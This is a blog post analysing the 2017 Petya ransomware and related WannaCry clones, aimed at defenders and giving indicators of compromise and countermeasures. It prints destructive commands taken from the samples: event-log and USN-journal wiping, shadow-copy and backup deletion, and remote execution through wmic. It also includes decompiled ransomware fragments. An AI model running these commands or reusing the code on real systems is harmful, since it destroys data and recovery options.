Saturday, July 1, 2017

Petya Ransomware Attack Wave

After Wannacry ransomware attack, Petya ransomware comes with new wave of attack. This ransomware campaign is currently taking place which has already impacted companies in countries across the world including the Ukraine, Spain, Russia, Netherlands, France, and India. Industries which we are aware of that have already been hit by this cyber-attack include the telecommunications, banking, transportation, life sciences, food & beverage, and power & utilities sectors.
The criminals behind the ransomware are requesting a ransom USD 300 in bitcoin – reportedly to be paid within three days - or else all files on the computer will be deleted (see screenshot below).

Possible mode of entry:
Petya ransomware spreading mechanism is email spam in the form of boobytrapped Office documents. These documents use the CVE-2017-0199 Office RTF vulnerability to download the installer and it leads to the execution of SMB worm to spreading like Wannacry ransomware. Wikileaks
For this CVE, the given description is:
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."

The generalized description as execution of arbitrary code using crafter document by remote attackers. Remote attackers meant that mode of entry as email spam. We received samples for analysis and based on our analysis we made the following findings.
Sample: SHA 256: 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
Actually this sample is very famous due to the many researchers given their opinion on this sample. So while doing our manual analysis, we simultaneously found the automated analysis report in the online platforms. But that sample is dll file, so we choose to continue our manual analysis. During our analysis, we also received another dll sample:
SHA 256: 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
We compared the compilation time of those samples and found mostly similar in timestamp.

The file properties are almost similar but when we checked the libraries and it is confirmed. Both this files are similar behavior only.
crypt32.dll     Crypto API32
iphlpapi.dll     IP Helper API
ws2_32.dll     Windows Socket 2.0 32-Bit DLL
mpr.dll                  Multiple Provider Router DLL
netapi32.dll        Net Win32 API DLL
dhcpsapi.dll        DHCP Server API Stub DLL
The above dll were used by ransomware samples during encryption, downloading, etc. Our interest goes to crypto API, which have the following functions called CryptBinaryToStringW,
CryptStringToBinaryW, CryptDecodeObjectEx. These functions used in converting array of bytes to formatted strings. Further we look in to the strings of the file and we noticed the encryption related strings:
·         CryptReleaseContext
·         CryptAcquireContext
·         CryptGenRandom
·         CryptExportKey
·         CryptAcquireContext
·         CryptSetKeyParam
·         CryptImportKey
·         CryptEncrypt
·         CryptGenKey
·         CryptDestroyKey
And after that we looked in to very interesting strings:
·         Microsoft Enhanced RSA and AES Cryptographic Provider
·         README.TXT
·         kernel32.dll
·         iphlpapi.dll
·         SeTcbPrivilege
·         SeShutdownPrivilege
·         SeDebugPrivilege
·         ComSpec
·         \cmd.exe
·         wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D
·         dllhost.dat
·         wbem\wmic.exe
process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1  Application & fsutil usn deletejournal /D

Since this is dll file (non com dll) it needs to register via rundll32.exe. We know that no user going to call the rundll32.exe to execute a dll file, meaning a normal user don’t know how the dlls are executed. Actually dll files are executed by the parent exe files. If we look in to the codes and strings, we can see the rundll32.exe calling and where our sample is stored.
·         00000001338C   00001001418C      0   ComSpec
·         00000001339C   00001001419C      0   \cmd.exe
·         0000000133B0   0000100141B0      0   wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
·         0000000134A8   0000100142A8      0   schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
·         000000013520   000010014320      0   at %02d:%02d %ws
·         000000013544   000010014344      0   shutdown.exe /r /f
·         00000001356C   00001001436C      0   /RU "SYSTEM"
·         00000001358C   00001001438C      0   dllhost.dat
·         0000000135FB   0000100143FB      0   u%s \\%s -accepteula -s
·         000000013630   000010014430      0   -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
·         0000000136A0   0000100144A0      0   wbem\wmic.exe
·         0000000136C0   0000100144C0      0   %s /node:"%ws" /user:"%ws" /password:"%ws"
·         000000013718   000010014518      0   process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
·         0000000137B4   0000100145B4      0   \\%s\admin$
·         0000000137CC   0000100145CC      0   \\%ws\admin$\%ws
·         000000015468   000010016C68      0   c:\Windows\
·         000000015480   000010016C80      0   rundll32.exe
·         000000016CD0   0000100184D0      0   rundll32.exe
·         000000016CF0   0000100184F0      0   c:\Windows\
In the above strings, we clear see that process call create which goes to rundll32.exe (physical location). And it again point to the physical location file in windows location. But this didn’t confirm whether this sample or any other files to be executed. So I copied the dll file to windows folder and execute the following command:
rundll32.exe <sample name.dll> #1
After that step, I refer the code of the dll and found the following:

So there is some connection between the file execution, schtasks and shutdown.exe. After executing dll, we saw schedule task is added.

It created At1 and scheduled for exactly one hour after the creation of this schedule task. Our guess or instinct says it is for shutdown call like we saw in the previous screen shot.

Our analysis is correct that schedule task actually for shutdown the system. After the restart it brings to ransom note page:

So we cannot access our file and it is encrypted. Payment instructions, bitcoin wallet details and purchased key prompt is blinking to enter. We randomly type some text and it throws incorrect key error.
Email address associated with this ransomware:
Current status of this email address:
Posteo is an email service provider offering the paid email accounts. In this petya ransomware case, attackers used posteo address as a contact option. Their abuse team checked this and blocked that contact address.
Hence, paying the ransom can’t be assured that victim will receive the decryption key from the attackers. They can’t contact the attacker using the email address.
We collected associated domains and ip for detection purpose with this post.
Ransomware spreading Url:
·         benkow(.)cc
·         Coffeinoffice(.)xyz
·         french-cooking(.)com
·         sundanders(.)online
·         casconut(.)xyz
·         blumbeerg(.)xyz  
·         insurepol(.)in
·         whitefoam(.)org(.)uk
·         xfusion(.)co(.)uk  
·         affliates(.)in  
·         hyporus(.)in
·         dantan(.)club  
·         kababmachatu(.)xyz  
·         damodot(.)xyz 
·         ballotvize(.)xyz
Bitcoin addresses: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
C&C payment servers:
·         mischapuk6hyrn72(.)onion/
·         petya3jxfp2f7g3i(.)onion/
·         petya3sen7dyko2n(.)onion/
·         mischa5xyix2mrhd(.)onion/MZ2MMJ
·         mischapuk6hyrn72(.)onion/MZ2MMJ
·         petya3jxfp2f7g3i(.)onion/MZ2MMJ
·         petya3sen7dyko2n(.)onion/MZ2MMJ
Possible IP address
·         185.165(.)29(.)78
·         84.200(.)16(.)242
·         111.90(.)139(.)247
·         95.141(.)115(.)108
·         89.146(.)220(.)134
Action steps:
Detection rules like snort, yara were available from independent sources in the net for this petya variant. Apply those snort rules in order to detect this ransomware attacks. Blocking ransomware spreading domains and IP in the Firewall and Proxy will prevent the attack. We recommend to block SMB port access and RDP (Remote Desktop Protocol) to all computers from the internet. Port 445 and 139 for SMB and 3389 for RDP should be blocked. We request to ensure that all windows OS are patched with latest security update especially MS17-010.
Petya vaccine available as batch file from bleeping computer:

Or you can copy the following batch file and save as .bat:
@echo off
REM Administrative check from here:
REM Vaccination discovered by
REM Batch file created by Lawrence Abrams of @bleepincomputer @lawrenceabrams

echo Administrative permissions required. Detecting permissions...
net session >nul 2>&1

if %errorLevel% == 0 (
if exist C:\Windows\perfc (
echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya.
) else (
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc
                echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll
                echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat

attrib +R C:\Windows\perfc
                attrib +R C:\Windows\perfc.dll
                attrib +R C:\Windows\perfc.dat

echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya.
) else (
echo Failure: You must run this batch file as Administrator.

Further Attack wave in Ukraine:
While writing of this analysis report, we came to know about wannacry clone attacks happening in Ukraine. We got three samples for analysis:
Sample1: MD5: 0BDE638B274C7F9C6C356D3987ED1A2D
Sample2: MD5: 87BE992695B752D86AEAB1116EB5393F
Sample3: MD5: 5C7C894A1CCFD8C8E0F174B0149A6601

All these three samples are .net compiled files:

Reversing the samples for analysis:
These samples shows like they were compiled on Jan 1 2016, but when we search those hashes in VT and they seems to be uploaded couple of days back only. So they were actually new samples only and compiling date seems to be customised or modified by the malware author.

The sample one shows that wannacry strains inside the code. We manually checked in other two samples too, they also have the same strains in the code. We successfully found the code of this samples.
Please find the program below:
                internal class Program
                                public static string DEMO_KEY_PRIVATE = "BwIAAACkAABSU0EyAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3zwglJxu5Q8S39zZe5sx0D5dOu/d2sS4JTBvO8q/ZaMCKEh3ngunldPVuoyplJ/2Xg3qa+1ZhSV3tyPZ4mL4zkp1IzbMYF1JKRFz1j+4RyMfUvprpGhdx/awOULSatR/B1h42lZqE7GcGJ1qZ7Vm+WQoI9UAzf68nq+t1MC0Rvv5TLK+nc7a5eZjJqPr4GaNrVqOgtQkzPumGOKS0e6ItQHHQwFuHOFZ+oB1JvM/4EXAPLLXAKCUmg+DFeOHn2+Qf37GlFFCS5gBL8zTlEy5QMSLBNRZuzDHG9Rz/9+oAYt8VF3aYnag4KIb9Ido3GCb/IXoxQ3MfNH3HUoZjZkvkuBf4F+rQ7QpJbUTHPjUzgzzHUoBk95SPyMAWubtsr9y/8IMJAXH6RBcPcGyZPZa+FsaPY8bpjvSqXhPHBYZ8bYkdaR0qQuPqF7HYoPW1v/fuDXYm08UzTKEjRgkmxbVhHCvsQHDDIvQ8VUf7OgPGnAP1IxsMloJEF3BVg3cCdpzjJQlfT/AbjOTjLwyc2MA7qXrJvi7b962NDkkrpDaZ1Rz5hWIiJPv5zV/jwscAlDFo9HryBH+2RaSN8LW6OhR/ZLYsyWmauyTOvzUPkIiYk5qsSmKctAlOy2FcQwdgOnXZDJqklhUmlzDS+Gk+nXgn0hWmDDYjCbZp/gy6ghgfTHIVNAEg5iUMLHdGy7gZrCuSo0CsvPBs0Z0DYAF88TAfhAeTfvhFILtmRIzig0E+OPI/F+jjMA7Uymb38cTzwA0AT9GEdJSIKXPhBzLVSKCgu8gMxnAOhRtWjZbpbPpCxvaGSGiRMLWHEhF73wy5595JCb1dAuvb9SYo2yDydQy1j/eAQ5BeG8fjSa5IjWVhyhR189kjN08twB+LpBKtsOsJWodXNxsR3vbaMoBcsVvIlynsfakVsbY+4d1ssinrrK5iSZwY4E4VhWK47WiHQSOM//6sO1qSDJBsMXyIEg4zKbT0dAfP5p3R7/TX3qi0Lpx6TvGppij6KvcQa1KEUiZEo5CJv08TgTgU0HS3QAj5VamRDc/m7dKGY4lz5u4aNLcyxgAOi4GVotTPyCKyya2HuLv6UAlW16tURm8asIniGcUG8tYjT+j3gtGr92Ww9niGz3wjtbffD9d4GX6SjAKpn7+fhJR+KFHZL6qfJqvziwFh7GyzF4QrMiwptkSkNhI=";
                                public static string DEMO_KEY_PUBLIC = "BgIAAACkAABSU0ExAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3";
                                public static string DEMO_EXTENSIONS = "jpg,jpeg,png,tif,gif,bmp";
                                public static string ENCRYPTION_TOOL_FNAME = "ed.exe";
                                public static string ENCRYPTED_PRIVATE_KEY_FNAME = "key.encrypted";
                                public static string[] ALL_EXTENSIONS = new string[]
                                public static List<string> ListDrives()
                                                DriveInfo[] arg_0B_0 = DriveInfo.GetDrives();
                                                List<string> list = new List<string>();
                                                DriveInfo[] array = arg_0B_0;
                                                for (int i = 0; i < array.Length; i++)
                                                                DriveInfo driveInfo = array[i];
                                                                if (driveInfo.DriveType == DriveType.Fixed || driveInfo.DriveType == DriveType.Removable || driveInfo.DriveType == DriveType.Network)
The above code snippet deals with keys, file extensions targeted and details about the encryption tool. We moved on to the next sample and it contains resources in the form of images for bitcoin details, ransom note details.
internal static Bitmap wannacry
                                return (Bitmap)Resources.ResourceManager.GetObject("wannacry", Resources.resourceCulture);

 Now we move to our final sample for analysis. It is very much interesting when we see the code.
// ed.CryptoFile
private static string[] _exProcesses = new string[]
This sample check for the presence of the anti-malware products present in the system. Further we see the Aes related code:
using (AesManaged aesManaged = new AesManaged())
                                                                aesManaged.Mode = CipherMode.CBC;
                                                                aesManaged.KeySize = 256;
                                                                aesManaged.Key = key;
                                                                aesManaged.IV = iv;
We shortened the cryptofile function in the following code snippet:
                public static class CryptoFile
                                public static long CRYPT_BYTES = 5242880L;
                                private static bool KillFileLockProcess(string path)
                                public static bool Encrypt(string path, byte[] publicKeyBlob)
                                public static bool Decrypt(string path, byte[] privateKeyBlob)
It also contains code to delete volume shadow copy services in this program and it as follows:
if (!(text == "-delshadowcopies"))
                                                                                                goto IL_52B;
                                                                                PS.ExecuteAndForget("cmd.exe", "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog –quiet");
                                                                                goto IL_52B;

Recent campaign of ransomware attacks giving numerous suggestions that it might done by threat actors or state sponsored attacks. Ukraine got specifically targeted in the last couple of weeks. Proper counter measures, periodic patches, timely assessment on host compromise, network compromise and vulnerability assessments can bring the organization in the safer side.

 Post made by 

1 comment:

neo said...

wonderful analysis #petya ransomware and #wannacry ransomware.

Operating system - Part 1:

 In our blog, we published several articles on OS concepts which mostly on the perspective for malware analysis/security research. In few in...